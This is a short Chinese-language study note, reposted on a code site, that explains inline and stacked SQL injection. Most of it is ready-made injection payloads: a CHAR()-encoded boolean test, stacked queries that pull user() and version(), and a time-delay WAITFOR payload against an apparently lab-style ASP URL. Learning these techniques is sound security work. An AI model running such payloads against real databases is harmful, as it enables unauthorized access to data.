內聯注入和堆疊注入


一、內聯注入

  select id from (select 1 as id)a;

   select * from T1,T3 where T1.userid=T3.userid;

   select * from admin,news where admin.uid=news.tid;

   select * from admin where uid = 1 and (SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (5032=5032) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))

 二、堆疊注入

  堆疊惡意sql語句,威脅度極高。

  select * from news;select 1,2,3,4,user(),version();

  payload:id=1;WAITFOR DELAY '0:0:5'--

  http://……/less-2.asp?id=1;WAITFOR DELAY '0:0:5'--

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM